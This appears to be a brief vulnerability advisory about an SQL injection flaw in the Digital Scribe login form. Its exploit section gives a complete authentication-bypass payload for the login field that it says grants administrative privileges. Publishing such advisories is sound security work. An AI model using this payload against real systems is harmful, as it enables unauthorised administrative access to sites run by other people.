• info
• discussion
• exploit
• solution
• references

Digital Scribe Login SQL Injection Vulnerability

No exploit is required.

The following is sufficient to gain administrative privileges:
login: " or isnull(1/0) /*
password: [whatever]